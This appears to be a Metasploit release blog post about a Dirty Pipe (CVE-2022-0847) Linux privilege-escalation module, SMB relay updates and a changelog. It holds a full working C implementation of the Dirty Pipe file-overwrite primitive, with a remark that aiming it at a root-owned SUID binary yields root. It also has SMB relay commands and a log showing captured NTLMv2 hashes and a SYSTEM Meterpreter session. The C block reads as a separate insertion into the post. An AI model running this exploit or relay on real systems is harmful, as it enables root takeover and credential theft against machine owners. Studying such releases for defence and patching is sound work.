CVSS3: 9.8 Critical
Attack Vector: NETWORK; Attack Complexity: LOW; Privileges Required: NONE; User Interaction: NONE; Scope: UNCHANGED; Confidentiality Impact: HIGH; Integrity Impact: HIGH; Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS2: 9 High
Access Vector: NETWORK; Access Complexity: LOW; Authentication: SINGLE; Confidentiality Impact: COMPLETE; Integrity Impact: COMPLETE; Availability Impact: COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
Thanks to some quick work by timwr, CVE-2022-0847 aka "Dirty Pipe" gives Metasploit a bit of digital plumber’s training. The exploit, which targets modern Linux v5 kernels, elevates user privileges by overwriting a SUID binary of your choice, plunging some payload gold through a pipe.
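To make the plumbing concrete, here is the page-cache overwrite primitive behind CVE-2022-0847 in C, written for this page as an added example; it is not the Metasploit module's code or anything from the original post. It assumes Linux with glibc and a writable /tmp, and it aims only at a read-only file the program creates itself (the file content is constructed sample data): the pipe is first filled and drained so every pipe buffer carries the merge flag, one byte of the target file is splice()d in, and the write() that follows lands in the page cache on an unpatched kernel. On a fixed kernel the file is left unchanged, and the self-test reports which case it saw.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

#define PAGE 4096

/* Fill the pipe completely with ordinary write()s and drain it again. Each
 * pipe_buffer that a write() creates gets PIPE_BUF_FLAG_CAN_MERGE; on a kernel
 * affected by CVE-2022-0847 the flag is never cleared when splice() later
 * reuses the buffer, which is what the overwrite below depends on. */
static int prime_pipe(int p[2])
{
    static char scratch[PAGE];
    if (pipe(p) < 0)
        return -1;
    int size = fcntl(p[1], F_GETPIPE_SZ);
    if (size < 0)
        return -1;
    for (int left = size; left > 0;) {
        size_t chunk = (size_t)left < sizeof scratch ? (size_t)left : sizeof scratch;
        ssize_t n = write(p[1], scratch, chunk);
        if (n <= 0)
            return -1;
        left -= (int)n;
    }
    for (int left = size; left > 0;) {
        size_t chunk = (size_t)left < sizeof scratch ? (size_t)left : sizeof scratch;
        ssize_t n = read(p[0], scratch, chunk);
        if (n <= 0)
            return -1;
        left -= (int)n;
    }
    return 0;
}

/* Try to write `len` bytes at `offset` into `path` while holding only a
 * read-only descriptor. splice() moves one byte of the file into the primed
 * pipe as a reference to the page-cache page; the write() that follows is
 * merged into that page on a vulnerable kernel. Same constraints as the
 * public PoC: the write may not begin on a page boundary or cross one.
 * Returns 0 when every syscall succeeded (this says nothing about whether
 * the file actually changed), -1 otherwise. */
int dirty_pipe_write(const char *path, off_t offset, const void *data, size_t len)
{
    if (offset <= 0 || offset % PAGE == 0 || (size_t)(offset % PAGE) + len > PAGE)
        return -1;
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    int p[2];
    if (prime_pipe(p) < 0) {
        close(fd);
        return -1;
    }
    off_t splice_off = offset - 1;      /* one byte before the target */
    int rc = -1;
    if (splice(fd, &splice_off, p[1], NULL, 1, 0) == 1 &&
        write(p[1], data, len) == (ssize_t)len)
        rc = 0;
    close(p[0]);
    close(p[1]);
    close(fd);
    return rc;
}

/* Harmless self-test against a file this process creates: returns 1 if the
 * read-only file's content changed (kernel vulnerable), 0 if it did not
 * (kernel patched), -1 if a syscall failed. */
int dirty_pipe_selftest(void)
{
    static const char original[] = "AAAAAAAAAAAAAAAA";   /* constructed sample content */
    static const char patch[] = "DIRTY";
    char path[] = "/tmp/dirtypipe-XXXXXX";               /* assumed writable */
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    int ok = write(fd, original, sizeof original - 1) == (ssize_t)(sizeof original - 1)
             && fchmod(fd, 0444) == 0;
    close(fd);
    int rc = ok ? dirty_pipe_write(path, 4, patch, sizeof patch - 1) : -1;
    char after[sizeof original] = {0};
    fd = open(path, O_RDONLY);
    if (fd >= 0) {
        if (read(fd, after, sizeof original - 1) != (ssize_t)(sizeof original - 1))
            rc = -1;
        close(fd);
    } else {
        rc = -1;
    }
    unlink(path);
    if (rc < 0)
        return -1;
    return memcmp(after, original, sizeof original - 1) != 0;
}

int main(void)
{
    int r = dirty_pipe_selftest();
    if (r < 0)
        perror("dirty pipe self-test");
    else
        printf("kernel %s to CVE-2022-0847\n", r ? "VULNERABLE" : "not vulnerable");
    return r < 0;
}
```

Compile with cc -o dirtypipe dirtypipe.c and run as an unprivileged user. Aimed at a root-owned SUID binary instead of a temp file, this is the same primitive the module relies on; the constraints that the write may not start on a page boundary or cross one are why the payload has to be patched into an existing binary in place.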
SMB, that magical ubiquitous service making all that noise on networks, just got even more fun. With the latest updates by adfoster-r7, the windows/smb/smb_relay module, which had been languishing in disuse due to evolutions in the protocol, is now more helpful than ever. Users can now relay over SMB versions 2 and 3, and even select multiple targets, which Metasploit will intelligently cycle through so that incoming connections are not wasted. As with any NTLM relay, a target that requires SMB signing will reject the relayed session, so choose relay targets where signing is not enforced.
Example module usage:
use windows/smb/smb_relay
set RELAY_TARGETS 192.168.123.4 192.168.123.25
set JOHNPWFILE ./relay_results.txt
run
Incoming requests have their hashes captured and are also relayed to the configured targets to run psexec:
msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22
[*] Received request for \admin
[*] Relaying to next target smb://192.168.123.4:445
[+] identity: \admin - Successfully authenticated against relay target smb://192.168.123.4:445
[SMB] NTLMv2-SSP Client : 192.168.123.4
[SMB] NTLMv2-SSP Username : \admin
[SMB] NTLMv2-SSP Hash : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:…
[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Selecting PowerShell target
[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Executing the payload...
[+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 192.168.123.4
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000
A session will be opened on the relay target with the associated credentials:
msf6 exploit(windows/smb/smb_relay) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ DESKTOP-N3MAG5R 192.168.123.1:4444 -> 192.168.123.4:52771 (192.168.123.4)
Further details can be found in the Metasploit SMB Relay documentation.
The Metasploit project is proud to return to Google Summer of Code for 2022. Contributor applications will open April 4th and close April 19th. Changes this year open the program up to all newcomers to open source who are 18 years and older. Join us on Slack and check out our How-To and Ideas pages to get started. We are still expanding on ideas and are eager to see what you’d like to add to Metasploit.
Affected Linux kernels start at version 5.8. The module leverages the vulnerability to overwrite an SUID binary in order to gain privileges as the root user.

Other changes in this release:

- Meterpreter TLV logging can be enabled with setg SessionTlvLogging true. Other values for the SessionTlvLogging option include console, false, and file:<file_location>. To try it out in msfconsole, run setg SessionTlvLogging true with a Meterpreter session open, then run a Meterpreter command such as dir.
- The enumextcmd and loadlib commands have been updated to log human-readable string identifiers in addition to the integer command IDs that were introduced as part of Metasploit 6.
- Adds the lcat command to Meterpreter, which allows the user to cat a local file.
- Fixes the to_handler command on Metasploit payloads. Previously, setting an LPORT value within a payload would not correctly override the previously set lport value.
- Fixes auxiliary/client/smtp/emailer, which previously handled multiline SMTP responses incorrectly, stopping the module from emailing the payload successfully.
- Updates the exploit/windows/local/bypassuac_comhijack module to identify Windows 10 versions 1903 and later as not being affected. This also switches the module to run the check method automatically, which helps inform users whether the target system is vulnerable.
- Fixes an issue in post/windows/manage/persistence_exe on Windows systems caused by the usage of IO.read.
- Updates msfvenom to use the new signing tool apksigner instead of jarsigner, which allows the applications to install successfully on the latest version of Android (Android 11).
- Fixes the windows/x64/encrypted_shell payloads.
- Fixes the hosts command’s tab completion and its --search option’s functionality.

As always, you can update to the latest Metasploit Framework with msfupdate, and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).